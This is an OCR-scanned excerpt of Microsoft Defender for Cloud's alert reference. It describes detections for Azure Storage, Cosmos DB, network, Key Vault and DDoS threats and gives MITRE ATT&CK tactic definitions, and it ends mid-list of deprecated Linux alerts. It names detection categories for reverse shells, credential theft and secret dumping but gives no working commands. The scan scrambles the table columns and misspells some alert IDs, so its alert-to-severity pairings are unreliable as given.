blob container's access 
level is misconfigured, and 
a malicious actor may 
have exploited the public 
access. The security alert 
includes the discovered 
sensitive information 
context (scanning time, 
classification label, 
information types, and file 
types). Learn more on 
sensitive data threat 
detection. 

Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 


enabled. 
Unusual amount of data extracted from a sensitive blob The alert indicates that Exfiltration Medium 
container (Preview) someone has extracted an 


Storage.Blob_DataExfiltration.AmountOfDataAnomaly.Sensitive unusually large number of 
blobs from a blob 
container with sensitive 
data in the storage 
account. 

Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 
enabled. 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Unusual number of blobs extracted from a sensitive blob The alert indicates that Exfiltration 

container (Preview) someone has extracted an 

Storage.Blob_DataExfiltration.NumberOfBlobsAnomaly.Sensitive unusually large amount of 
data from a blob container 
with sensitive data in the 
storage account. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 


enabled. 
Access from a known suspicious application to a sensitive The alert indicates that Initial Access High 
blob container (Preview) someone with a known 
Storage.Blob_SuspiciousApp.Sensitive suspicious application 


accessed a blob container 
with sensitive data in the 
storage account and 
performed authenticated 
operations. 

The access may indicate 
that a threat actor 
obtained credentials to 
access the storage 
account by using a known 
suspicious application. 
However, the access could 
also indicate a penetration 
test carried out in the 
organization. 


Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 
enabled. 


Alert (alert type) Description MITRE tactics Severity 
(Learn more) 


Access from a known suspicious IP address to a sensitive blob The alert indicates that Pre-Attack High 
container (Preview) someone accessed a blob 
Storage.Blob_Suspiciouslp.Sensitive container with sensitive 


data in the storage 
account from a known 
suspicious IP address 
associated with threat intel 
by Microsoft Threat 
Intelligence. Since the 
access was authenticated, 
it's possible that the 
credentials allowing access 
to this storage account 
were compromised. 

Learn more 

about Microsoft's threat 
intelligence capabilities £. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 


enabled. 
Access from a Tor exit node to a sensitive blob container The alert indicates that Pre-Attack High 
(Preview) someone with an IP 
Storage.Blob_TorAnomaly.Sensitive address known to be a Tor 


exit node accessed a blob 
container with sensitive 
data in the storage 
account with 
authenticated access. 
Authenticated access from 
a Tor exit node strongly 
indicates that the actor is 
attempting to remain 
anonymous for possible 
malicious intent. Since the 
access was authenticated, 
it's possible that the 
credentials allowing access 
to this storage account 
were compromised. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 
enabled. 


Alert (alert type) 


Access from an unusual location to a sensitive blob container 


(Preview) 
Storage.Blob_GeoAnomaly.Sensitive 


The access level of a sensitive storage blob container was 
changed to allow unauthenticated public access (Preview) 


Storage.Blob_OpenACL.Sensitive 


Description MITRE tactics 
(Learn more) 


The alert indicates that Initial Access 
someone has accessed 
blob container with 
sensitive data in the 
storage account with 
authentication from an 
unusual location. Since the 
access was authenticated, 
it's possible that the 
credentials allowing access 
to this storage account 
were compromised. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 
enabled. 


The alert indicates that Collection 
someone has changed the 
access level of a blob 
container in the storage 
account, which contains 
sensitive data, to the 
‘Container’ level, which 
allows unauthenticated 
(anonymous) public 
access. The change was 
made through the Azure 
portal. 

The access level change 
may compromise the 
security of the data. We 
recommend taking 
immediate action to 
secure the data and 
prevent unauthorized 
access in case this alert is 
triggered. 

Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the data sensitivity 
threat detection feature 
enabled. 


Severity 


Medium 


High 


Alert (alert type) 


Suspicious external access to an Azure storage account with 


overly permissive SAS token (Preview) 


Storage.Blob_AccountSas.|nternalSasUsedExternally 


Description MITRE tactics 
(Learn more) 


The alert indicates that Exfiltration / 
someone with an external Resource 
(public) IP address Development / 
accessed the storage Impact 


account using an overly 
permissive SAS token with 
a long expiration date. 
This type of access is 
considered suspicious 
because the SAS token is 
typically only used in 
internal networks (from 
private IP addresses). 

The activity may indicate 
that a SAS token has been 
leaked by a malicious 
actor or leaked 
unintentionally from a 
legitimate source. 

Even if the access is 
legitimate, using a high- 
permission SAS token with 
along expiration date 
goes against security best 
practices and poses a 
potential security risk. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan. 


Severity 


Medium 


Alert (alert type) 


Suspicious external operation to an Azure storage account 


with overly permissive SAS token (Preview) 


Storage.Blob_AccountSas.UnusualOperationFromExternallp 


Description MITRE tactics 
(Learn more) 


The alert indicates that Exfiltration / 
someone with an external Resource 
(public) IP address Development / 


accessed the storage Impact 
account using an overly 
permissive SAS token with 
along expiration date. The 
access is considered 
suspicious because 
operations invoked 
outside your network (not 
from private IP addresses) 
with this SAS token are 
typically used for a specific 
set of Read/Write/Delete 
operations, but other 
operations occurred, 
which makes this access 
suspicious. 

This activity may indicate 
that a SAS token has been 
leaked by a malicious 
actor or leaked 
unintentionally from a 
legitimate source. 

Even if the access is 
legitimate, using a high- 
permission SAS token with 
a long expiration date 
goes against security best 
practices and poses a 
potential security risk. 
Applies to: Azure Blob 
(Standard general-purpose 
v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan. 


Severity 


Medium 


Alert (alert type) 


Unusual SAS token was used to access an Azure storage 


account from a public IP address (Preview) 
Storage.Blob_AccountSas.UnusualExternalAccess 


Malicious file uploaded to storage account (Preview) 


Storage.Blob_AM.MalwareFound 


Alerts for Azure Cosmos DB 


Further details and notes 


Alert (alert type) 


Description 


The alert indicates that 
someone with an external 
(public) IP address has 
accessed the storage 
account using an account 
SAS token. The access is 
highly unusual and 
considered suspicious, as 
access to the storage 
account using SAS tokens 
typically comes only from 
internal (private) IP 
addresses. 

It's possible that a SAS 
token was leaked or 
generated by a malicious 
actor either from within 
your organization or 
externally to gain access 
to this storage account. 
Applies to: Azure Blob 


(Standard general-purpose 


v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan. 


The alert indicates that a 
malicious blob was 
uploaded to a storage 
account. This security alert 
is generated by the 
Malware Scanning feature 
in Defender for Storage. 
Potential causes may 
include an intentional 
upload of malware by a 
threat actor or an 
unintentional upload of a 
malicious file by a 
legitimate user. 

Applies to: Azure Blob 


(Standard general-purpose 


v2, Azure Data Lake 
Storage Gen2 or premium 
block blobs) storage 
accounts with the new 
Defender for Storage plan 
with the Malware 
Scanning feature enabled. 


Description 


MITRE tactics Severity 
(Learn more) 
Exfiltration / Low 


Resource 
Development / 
Impact 


LateralMovement High 


MITRE 
tactics 
(Learn 
more) 


Severity 


Alert (alert type) 


Access from a Tor exit node 
(CosmosDB_TorAnomaly) 


Access from a suspicious IP 
(CosmosDB_Suspiciouslp) 


Access from an unusual location 
(CosmosDB_GeoAnomaly) 


Unusual volume of data extracted 
(CosmosDB_DataExfiltrationAnomaly) 


Extraction of Azure Cosmos DB accounts keys via a 
potentially malicious script 
(CosmosDB_SuspiciousListKeys.MaliciousScript) 


Suspicious extraction of Azure Cosmos DB account 
keys 
(AzureCosmosDB _SuspiciousListKeys.SuspiciousPrincipal) 


MITRE 
tactics 


Description 


(Learn 

more) 
This Azure Cosmos DB account was Initial 
successfully accessed from an IP address Access 
known to be an active exit node of Tor, an 
anonymizing proxy. Authenticated access 
from a Tor exit node is a likely indication that 
a threat actor is trying to hide their identity. 
This Azure Cosmos DB account was Initial 
successfully accessed from an IP address that Access 
was identified as a threat by Microsoft Threat 
Intelligence. 
This Azure Cosmos DB account was accessed Initial 
from a location considered unfamiliar, based Access 


on the usual access pattern. 


Either a threat actor has gained access to the 
account, or a legitimate user has connected 
from a new or unusual geographic location 


An unusually large volume of data has been Exfiltration 
extracted from this Azure Cosmos DB 
account. This might indicate that a threat 


actor exfiltrated data. 


A PowerShell script was run in your Collection 
subscription and performed a suspicious 
pattern of key-listing operations to get the 


keys of Azure Cosmos DB accounts in your 


subscription. Threat actors use automated 
scripts, like Microburst, to list keys and find 
Azure Cosmos DB accounts they can access. 


This operation might indicate that an identity 
in your organization was breached, and that 
the threat actor is trying to compromise 
Azure Cosmos DB accounts in your 
environment for malicious intentions. 


Alternatively, a malicious insider could be 
trying to access sensitive data and perform 
lateral movement. 


A suspicious source extracted Azure Cosmos Credential 


DB account access keys from your Access 
subscription. If this source is not a legitimate 

source, this may be a high impact issue. The 

access key that was extracted provides full 

control over the associated databases and 

the data stored within. See the details of each 

specific alert to understand why the source 


was flagged as suspicious. 


Severity 


High/Medium 


Medium 


Low 


Medium 


High 


high 


Alert (alert type) 


SQL injection: potential data exfiltration 
(CosmosDB_Sqllnjection.DataExfiltration) 


SQL injection: fuzzing attempt 
(CosmosDB_Sq]Injection.FailedFuzzingAttempt) 


Description 


A suspicious SQL statement was used to 
query a container in this Azure Cosmos DB 
account. 


The injected statement might have 
succeeded in exfiltrating data that the threat 
actor isn't authorized to access. 


Due to the structure and capabilities of Azure 
Cosmos DB queries, many known SQL 
injection attacks on Azure Cosmos DB 
accounts can't work. However, the variation 
used in this attack may work and threat 
actors can exfiltrate data. 


A suspicious SQL statement was used to 
query a container in this Azure Cosmos DB 
account. 


Like other well-known SQL injection attacks, 
this attack won't succeed in compromising 
the Azure Cosmos DB account. 


Nevertheless, it's an indication that a threat 
actor is trying to attack the resources in this 
account, and your application may be 
compromised. 


Some SQL injection attacks can succeed and 
be used to exfiltrate data. This means that if 
the attacker continues performing SQL 
injection attempts, they may be able to 
compromise your Azure Cosmos DB account 
and exfiltrate data. 


You can prevent this threat by using 
parameterized queries. 


Alerts for Azure network layer 


Further details and notes 


Alert (alert type) Description 


Exfiltration 


MITRE Severity 


tactics 
(Learn 
more) 


Pre-attack Low 


MITRE 
tactics 
(Learn 
more) 


Network communication with a malicious Network traffic analysis indicates that your machine (IP %{Victim | Command 


machine detected IP}) has communicated with what is possibly a Command and 


(Network_CommunicationWithC2) Control center. When the compromised resource is a load 


and 
Control 


balancer or an application gateway, the suspected activity might 


indicate that one or more of the resources in the backend pool 


(of the load balancer or application gateway) has communicated 


with what is possibly a Command and Control center. 


Medium 


Severity 


Medium 


Alert (alert type) 


Possible compromised machine detected 
(Network_ResourcelpIndicatedAsMalicious) 


Possible incoming %{Service Name} brute 
force attempts detected 
(Generic_Incoming_BF_OneToOne) 


Possible incoming SQL brute force 
attempts detected 
(SQL_Incoming_BF_OneToOne) 


Possible outgoing denial-of-service 
attack detected 
(DDOS) 


Suspicious incoming RDP network 
activity from multiple sources 
(RDP_Incoming_BF_ManyToOne) 


Description 


Threat intelligence indicates that your machine (at IP %{Machine 
IP}) may have been compromised by a malware of type 
Conficker. Conficker was a computer worm that targets the 
Microsoft Windows operating system and was first detected in 
November 2008. Conficker infected millions of computers 
including government, business and home computers in over 
200 countries/regions, making it the largest known computer 
worm infection since the 2003 Welchia worm. 


Network traffic analysis detected incoming %{Service Name} 
communication to %{Victim IP}, associated with your resource % 
{Compromised Host} from %{Attacker IP}. When the 
compromised resource is a load balancer or an application 
gateway, the suspected incoming traffic has been forwarded to 
one or more of the resources in the backend pool (of the load 
balancer or application gateway). Specifically, sampled network 
data shows suspicious activity between %{Start Time} and %{End 
Time} on port %{Victim Port}. This activity is consistent with 
brute force attempts against %{Service Name} servers. 


Network traffic analysis detected incoming SQL communication 
to %{Victim IP}, associated with your resource %{Compromised 
Host}, from %{Attacker IP}. When the compromised resource is a 
load balancer or an application gateway, the suspected 
incoming traffic has been forwarded to one or more of the 
resources in the backend pool (of the load balancer or 
application gateway). Specifically, sampled network data shows 


suspicious activity between %{Start Time} and %{End Time} on 
port %{Port Number} (%{SQL Service Type}). This activity is 
consistent with brute force attempts against SQL servers. 


Network traffic analysis detected anomalous outgoing activity 
originating from %{Compromised Host}, a resource in your 
deployment. This activity may indicate that your resource was 
compromised and is now engaged in denial-of-service attacks 
against external endpoints. When the compromised resource is 
a load balancer or an application gateway, the suspected activity 
might indicate that one or more of the resources in the backend 
pool (of the load balancer or application gateway) was 
compromised. Based on the volume of connections, we believe 
that the following IPs are possibly the targets of the DOS attack: 
%{Possible Victims}. Note that it is possible that the 
communication to some of these IPs is legitimate. 


Network traffic analysis detected anomalous incoming Remote 
Desktop Protocol (RDP) communication to %{Victim IP}, 
associated with your resource %{Compromised Host}, from 
multiple sources. When the compromised resource is a load 
balancer or an application gateway, the suspected incoming 
traffic has been forwarded to one or more of the resources in 
the backend pool (of the load balancer or application gateway). 
Specifically, sampled network data shows %{Number of 
Attacking IPs} unique IPs connecting to your resource, which is 
considered abnormal for this environment. This activity may 
indicate an attempt to brute force your RDP end point from 
multiple hosts (Botnet) 


MITRE 
tactics 
(Learn 
more) 


Command 
and 
Control 


PreAttack 


PreAttack 


Impact 


PreAttack 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Alert (alert type) 


Suspicious incoming RDP network 
activity 
(RDP_Incoming_BF_OneToOne) 


Suspicious incoming SSH network activity 
from multiple sources 
(SSH_Incoming_BF_ManyToOne) 


Suspicious incoming SSH network activity 
(SSH_Incoming_BF_OneToOne) 


Suspicious outgoing %{Attacked 
Protocol} traffic detected 
(PortScanning) 


Suspicious outgoing RDP network activity 
to multiple destinations 
(RDP_Outgoing_BF_OneToMany) 


Description 


Network traffic analysis detected anomalous incoming Remote 
Desktop Protocol (RDP) communication to %{Victim IP}, 
associated with your resource %{Compromised Host}, from % 
{Attacker IP}. When the compromised resource is a load balancer 
or an application gateway, the suspected incoming traffic has 
been forwarded to one or more of the resources in the backend 
pool (of the load balancer or application gateway). Specifically, 
sampled network data shows %{Number of Connections} 
incoming connections to your resource, which is considered 
abnormal for this environment. This activity may indicate an 
attempt to brute force your RDP end point 


Network traffic analysis detected anomalous incoming SSH 
communication to %{Victim IP}, associated with your resource % 
{Compromised Host}, from multiple sources. When the 
compromised resource is a load balancer or an application 
gateway, the suspected incoming traffic has been forwarded to 
one or more of the resources in the backend pool (of the load 


balancer or application gateway). Specifically, sampled network 
data shows %{Number of Attacking IPs} unique IPs connecting 
to your resource, which is considered abnormal for this 
environment. This activity may indicate an attempt to brute 
force your SSH end point from multiple hosts (Botnet) 


Network traffic analysis detected anomalous incoming SSH 
communication to %{Victim IP}, associated with your resource % 
{Compromised Host}, from %{Attacker IP}. When the 
compromised resource is a load balancer or an application 
gateway, the suspected incoming traffic has been forwarded to 
one or more of the resources in the backend pool (of the load 


balancer or application gateway). Specifically, sampled network 
data shows %{Number of Connections} incoming connections to 
your resource, which is considered abnormal for this 
environment. This activity may indicate an attempt to brute 
force your SSH end point 


Network traffic analysis detected suspicious outgoing traffic 
from %{Compromised Host} to destination port %{Most 
Common Port}. When the compromised resource is a load 
balancer or an application gateway, the suspected outgoing 
traffic has been originated from to one or more of the resources 
in the backend pool (of the load balancer or application 
gateway). This behavior may indicate that your resource is 
taking part in %{Attacked Protocol} brute force attempts or port 
sweeping attacks. 


Network traffic analysis detected anomalous outgoing Remote 
Desktop Protocol (RDP) communication to multiple destinations 
originating from %{Compromised Host} (%{Attacker IP}), a 
resource in your deployment. When the compromised resource 
is a load balancer or an application gateway, the suspected 
outgoing traffic has been originated from to one or more of the 
resources in the backend pool (of the load balancer or 
application gateway). Specifically, sampled network data shows 
your machine connecting to %{Number of Attacked IPs} unique 
IPs, which is considered abnormal for this environment. This 
activity may indicate that your resource was compromised and is 
now used to brute force external RDP end points. Note that this 
type of activity could possibly cause your IP to be flagged as 
malicious by external entities. 


MITRE 
tactics 
(Learn 
more) 


PreAttack 


PreAttack 


PreAttack 


Discovery 


Discovery 


Severity 


Medium 


Medium 


Medium 


Medium 


High 


Alert (alert type) 


Suspicious outgoing RDP network activity 
(RDP_Outgoing_BF_OneToOne) 


Suspicious outgoing SSH network activity 
to multiple destinations 
(SSH_Outgoing_BF_OneToMany) 


Suspicious outgoing SSH network activity 
(SSH_Outgoing_BF_OneToOne) 


Traffic detected from IP addresses 
recommended for blocking 


Description MITRE 
tactics 
(Learn 
more) 


Network traffic analysis detected anomalous outgoing Remote Lateral 
Desktop Protocol (RDP) communication to %{Victim IP} Movement 
originating from %{Compromised Host} (%{Attacker IP}), a 

resource in your deployment. When the compromised resource 

is a load balancer or an application gateway, the suspected 

outgoing traffic has been originated from to one or more of the 

resources in the backend pool (of the load balancer or 

application gateway). Specifically, sampled network data shows 

%{Number of Connections} outgoing connections from your 

resource, which is considered abnormal for this environment. 

This activity may indicate that your machine was compromised 

and is now used to brute force external RDP end points. Note 

that this type of activity could possibly cause your IP to be 

flagged as malicious by external entities. 


Network traffic analysis detected anomalous outgoing SSH Discovery 
communication to multiple destinations originating from % 
{Compromised Host} (%{Attacker IP}), a resource in your 
deployment. When the compromised resource is a load balancer 
or an application gateway, the suspected outgoing traffic has 
been originated from to one or more of the resources in the 
backend pool (of the load balancer or application gateway). 
Specifically, sampled network data shows your resource 
connecting to %{Number of Attacked IPs} unique IPs, which is 
considered abnormal for this environment. This activity may 
indicate that your resource was compromised and is now used 
to brute force external SSH end points. Note that this type of 
activity could possibly cause your IP to be flagged as malicious 
by external entities. 


Network traffic analysis detected anomalous outgoing SSH Lateral 
communication to %{Victim IP} originating from % Movement 
{Compromised Host} (%{Attacker IP}), a resource in your 

deployment. When the compromised resource is a load balancer 

or an application gateway, the suspected outgoing traffic has 

been originated from to one or more of the resources in the 

backend pool (of the load balancer or application gateway). 

Specifically, sampled network data shows %{Number of 

Connections} outgoing connections from your resource, which is 
considered abnormal for this environment. This activity may 

indicate that your resource was compromised and is now used 

to brute force external SSH end points. Note that this type of 

activity could possibly cause your IP to be flagged as malicious 

by external entities. 


Microsoft Defender for Cloud detected inbound traffic from IP Probing 
addresses that are recommended to be blocked. This typically 

occurs when this IP address doesn't communicate regularly with 

this resource. Alternatively, the IP address has been flagged as 

malicious by Defender for Cloud's threat intelligence sources. 


Alerts for Azure Key Vault 


Further details and notes 


Severity 


High 


Medium 


Medium 


Low 


Alert (alert type) 


Access from a suspicious IP address to a 
key vault 
(KV_Suspicious|PAccess) 


Access from a TOR exit node to a key 
vault 
(KV_TORAccess) 


High volume of operations in a key vault 
(KV_OperationVolumeAnomaly) 


Suspicious policy change and secret query 
in a key vault 
(KV_PutGetAnomaly) 


Suspicious secret listing and query ina 
key vault 
(KV_ListGetAnomaly) 


Unusual access denied - User accessing 
high volume of key vaults denied 
(KV_AccountVolumeAccessDeniedAnomaly) 


Unusual access denied - Unusual user 
accessing key vault denied 
(KV_UserAccessDeniedAnomaly) 


Unusual application accessed a key vault 
(KV_AppAnomaly) 


Description 


A key vault has been successfully accessed by an IP that has 
been identified by Microsoft Threat Intelligence as a suspicious 
IP address. This may indicate that your infrastructure has been 
compromised. We recommend further investigation. Learn more 
about Microsoft's threat intelligence capabilities Z. 


A key vault has been accessed from a known TOR exit node. This 
could be an indication that a threat actor has accessed the key 


vault and is using the TOR network to hide their source location. 
We recommend further investigations. 


An anomalous number of key vault operations were performed 
by a user, service principal, and/or a specific key vault. This 
anomalous activity pattern may be legitimate, but it could be an 
indication that a threat actor has gained access to the key vault 
and the secrets contained within it. We recommend further 
investigations. 


A user or service principal has performed an anomalous Vault 
Put policy change operation followed by one or more Secret Get 
operations. This pattern is not normally performed by the 
specified user or service principal. This may be legitimate 
activity, but it could be an indication that a threat actor has 
updated the key vault policy to access previously inaccessible 
secrets. We recommend further investigations. 


A user or service principal has performed an anomalous Secret 
List operation followed by one or more Secret Get operations. 
This pattern is not normally performed by the specified user or 
service principal and is typically associated with secret dumping. 
This may be legitimate activity, but it could be an indication that 
a threat actor has gained access to the key vault and is trying to 
discover secrets that can be used to move laterally through your 
network and/or gain access to sensitive resources. We 
recommend further investigations. 


A user or service principal has attempted access to anomalously 
high volume of key vaults in the last 24 hours. This anomalous 
access pattern may be legitimate activity. Though this attempt 
was unsuccessful, it could be an indication of a possible attempt 
to gain access of key vault and the secrets contained within it. 
We recommend further investigations. 


A key vault access was attempted by a user that does not 
normally access it, this anomalous access pattern may be 
legitimate activity. Though this attempt was unsuccessful, it 
could be an indication of a possible attempt to gain access of 
key vault and the secrets contained within it. 


A key vault has been accessed by a service principal that doesn't 
normally access it. This anomalous access pattern may be 
legitimate activity, but it could be an indication that a threat 
actor has gained access to the key vault in an attempt to access 
the secrets contained within it. We recommend further 
investigations. 


MITRE 
tactics 
(Learn 
more) 


Credential 
Access 


Credential 
Access 


Credential 
Access 


Credential 
Access 


Credential 
Access 


Discovery 


Initial 
Access, 
Discovery 


Credential 
Access 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Low 


Low 


Medium 


Alert (alert type) 


Unusual operation pattern in a key vault 
(KV_OperationPatternAnomaly) 


Unusual user accessed a key vault 
(KV_UserAnomaly) 


Unusual user-application pair accessed a 
key vault 
(KV_UserAppAnomaly) 


User accessed high volume of key vaults 
(KV_AccountVolumeAnomaly) 


Denied access from a suspicious IP to a 
key vault 
(KV_SuspiciousIPAccessDenied) 


Unusual access to the key vault from a 
suspicious IP (Non-Microsoft or External) 
(KV_UnusualAccessSuspicious!P) 


Description 


MITRE 
tactics 
(Learn 
more) 


An anomalous pattern of key vault operations was performed by Credential 


a user, service principal, and/or a specific key vault. This 


Access 


anomalous activity pattern may be legitimate, but it could be an 


indication that a threat actor has gained access to the key vault 
and the secrets contained within it. We recommend further 
investigations. 


A key vault has been accessed by a user that does not normally 
access it. This anomalous access pattern may be legitimate 
activity, but it could be an indication that a threat actor has 
gained access to the key vault in an attempt to access the 
secrets contained within it. We recommend further 
investigations. 


A key vault has been accessed by a user-service principal pair 
that doesn't normally access it. This anomalous access pattern 
may be legitimate activity, but it could be an indication that a 
threat actor has gained access to the key vault in an attempt to 
access the secrets contained within it. We recommend further 
investigations. 


A user or service principal has accessed an anomalously high 
volume of key vaults. This anomalous access pattern may be 
legitimate activity, but it could be an indication that a threat 
actor has gained access to multiple key vaults in an attempt to 
access the secrets contained within them. We recommend 
further investigations. 


An unsuccessful key vault access has been attempted by an IP 
that has been identified by Microsoft Threat Intelligence as a 
suspicious IP address. Though this attempt was unsuccessful, it 
indicates that your infrastructure might have been 
compromised. We recommend further investigations. 


A user or service principal has attempted anomalous access to 
key vaults from a non-Microsoft IP in the last 24 hours. This 


Credential 
Access 


Credential 
Access 


Credential 
Access 


Credential 
Access 


Credential 
Access 


anomalous access pattern may be legitimate activity. It could be 


an indication of a possible attempt to gain access of the key 


vault and the secrets contained within it. We recommend further 


investigations. 


Alerts for Azure DDoS Protection 


Further details and notes 


Alert Description 


DDoS Attack detected for Public IP © DDoS Attack detected for Public IP (IP address) and being 
(NETWORK_DDOS_DETECTED) mitigated. 


DDoS Attack mitigated for Public DDoS Attack mitigated for Public IP (IP address). 


IP 
(NETWORK_DDOS_MITIGATED) 


MITRE ATT&CK tactics 


MITRE 
tactics 
(Learn more) 


Probing 


Probing 


Severity 


Medium 


Medium 


Medium 


Medium 


Low 


Medium 


Severity 


High 


Low 


Understanding the intention of an attack can help you investigate and report the event more easily. To help with these 


efforts, Microsoft Defender for Cloud alerts include the MITRE tactics with many alerts. 


The series of steps that describe the progression of a cyberattack from reconnaissance to data exfiltration is often 


referred to as a “kill chain". 


Defender for Cloud's supported kill chain intents are based on version 9 of the MITRE ATT&CK matrix? and described in 


the table below. 


Tactic 


PreAttack 


Initial Access 


Persistence 


Privilege 
Escalation 


Defense Evasion 


Credential Access 


Discovery 


LateralMovement 


Execution 


Collection 


Command and 
Control 


ATT&CK Description 


Version 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


V7, V9 


PreAttack@ could be either an attempt to access a certain resource regardless of a malicious intent, or 
a failed attempt to gain access to a target system to gather information prior to exploitation. This step 
is usually detected as an attempt, originating from outside the network, to scan the target system and 
identify an entry point. 


Initial Access is the stage where an attacker manages to get a foothold on the attacked resource. This 
stage is relevant for compute hosts and resources such as user accounts, certificates etc. Threat actors 
will often be able to control the resource after this stage. 


Persistence is any access, action, or configuration change to a system that gives a threat actor a 
persistent presence on that system. Threat actors will often need to maintain access to systems 
through interruptions such as system restarts, loss of credentials, or other failures that would require a 
remote access tool to restart or provide an alternate backdoor for them to regain access. 


Privilege escalation is the result of actions that allow an adversary to obtain a higher level of 
permissions on a system or network. Certain tools or actions require a higher level of privilege to work 
and are likely necessary at many points throughout an operation. User accounts with permissions to 
access specific systems or perform specific functions necessary for adversaries to achieve their 
objective may also be considered an escalation of privilege. 


Defense evasion consists of techniques an adversary may use to evade detection or avoid other 
defenses. Sometimes these actions are the same as (or variations of) techniques in other categories 
that have the added benefit of subverting a particular defense or mitigation. 


Credential access represents techniques resulting in access to or control over system, domain, or 
service credentials that are used within an enterprise environment. Adversaries will likely attempt to 
obtain legitimate credentials from users or administrator accounts (local system administrator or 
domain users with administrator access) to use within the network. With sufficient access within a 
network, an adversary can create accounts for later use within the environment. 


Discovery consists of techniques that allow the adversary to gain knowledge about the system and 
internal network. When adversaries gain access to a new system, they must orient themselves to what 
they now have control of and what benefits operating from that system give to their current objective 
or overall goals during the intrusion. The operating system provides many native tools that aid in this 
post-compromise information-gathering phase. 


Lateral movement consists of techniques that enable an adversary to access and control remote 
systems on a network and could, but does not necessarily, include execution of tools on remote 
systems. The lateral movement techniques could allow an adversary to gather information from a 
system without needing more tools, such as a remote access tool. An adversary can use lateral 
movement for many purposes, including remote Execution of tools, pivoting to more systems, access 
to specific information or files, access to more credentials, or to cause an effect. 


The execution tactic represents techniques that result in execution of adversary-controlled code ona 
local or remote system. This tactic is often used in conjunction with lateral movement to expand access 
to remote systems on a network. 


Collection consists of techniques used to identify and gather information, such as sensitive files, from a 
target network prior to exfiltration. This category also covers locations on a system or network where 
the adversary may look for information to exfiltrate. 


The command and control tactic represents how adversaries communicate with systems under their 
control within a target network. 


Tactic ATT&CK Description 


Version 
Exfiltration V7, V9 Exfiltration refers to techniques and attributes that result or aid in the adversary removing files and 
information from a target network. This category also covers locations on a system or network where 
the adversary may look for information to exfiltrate. 
Impact V7, V9 Impact events primarily try to directly reduce the availability or integrity of a system, service, or 


network; including manipulation of data to impact a business or operational process. This would often 
refer to techniques such as ransomware, defacement, data manipulation, and others. 


© Note 


For alerts that are in preview: The Azure Preview Supplemental Terms Z include additional legal terms that apply to 
Azure features that are in beta, preview, or otherwise not yet released into general availability. 


Deprecated Defender for Servers alerts 


The following tables include the Defender for Servers security alerts which have been deprecated in April, 2023 due to an 
improvement process. 


Deprecated Linux alerts 


Alert Type Alert Display Name Severity 
VM_AbnormalDaemontTermination Abnormal Termination Low 
VM_BinaryGeneratedFromCommandLine Suspicious binary detected Medium 
VM_CommandlineSuspectDomain Suspicious domain name reference Low 
VM_CommonBot Behavior similar to common Linux bots detected Medium 
VM_CompCommonBots Commands similar to common Linux bots detected Medium 
VM_CompSuspiciousScript Shell Script Detected Medium 
VM_CompTestRule Composite Analytic Test Alert Low 


VM_CronJobAccess 


Manipulation of scheduled tasks detected 


Informational 


VM_CryptoCoinMinerArtifacts Process associated with digital currency mining detected Medium 
VM_CryptoCoinMinerDownload Possible Cryptocoinminer download detected Medium 
VM_CryptoCoinMinerExecution Potential crypto coin miner started Medium 
VM_DataEgressArtifacts Possible data exfiltration detected Medium 
VM_DigitalCurrencyMining Digital currency mining related behavior detected High 

VM_DownloadAndRunCombo Suspicious Download Then Run Activity Medium 
VM_EICAR Microsoft Defender for Cloud test alert (not a threat) High 


VM_ExecuteHiddenFile 


Execution of hidden file 


Informational 


VM_ExploitAttempt Possible command line exploitation attempt Medium 
VM_ExposedDocker Exposed Docker daemon on TCP socket Medium 
VM_FairwareMalware Behavior similar to Fairware ransomware detected Medium 
VM_FirewallDisabled Manipulation of host firewall detected Medium 


Alert Type 

VM_HadoopYarnExploit 
VM_HistoryFileCleared 
VM_KnownLinuxAttackTool 
VM_KnownLinuxCredentialAccessTool 
VM_KnownLinuxDDoSToolkit 
VM_KnownLinuxScreenshotTool 
VM_LinuxBackdoorArtifact 
VM_LinuxReconnaissance 
VM_MismatchedScriptFeatures 


VM_MitreCalderaTools 


VM_NewSingleUserModeStartupScript 


VM_NewSudoerAccount 
VM_OverridingCommonFiles 
VM_PrivilegedContainerArtifacts 
VM_PrivilegedExecutionInContainer 
VM_ReadingHistoryFile 
VM_ReverseShell 
VM_SshKeyAccess 
VM_SshKeyAddition 
VM_SuspectCompilation 
VM_SuspectConnection 
VM_SuspectDownload 
VM_SuspectDownloadaArtifacts 
VM_SuspectExecutablePath 
VM_SuspectHtaccessFileAccess 
VM_SuspectlnitialShellCommand 


VM_SuspectMixedCaseText 


VM_SuspectNetworkConnection 
VM_SuspectNohup 
VM_SuspectPasswordChange 
VM_SuspectPasswordFileAccess 
VM_SuspectPhp 


VM_SuspectPortForwarding 


VM_SuspectProcessAccountPrivilegeCombo 


Alert Display Name 
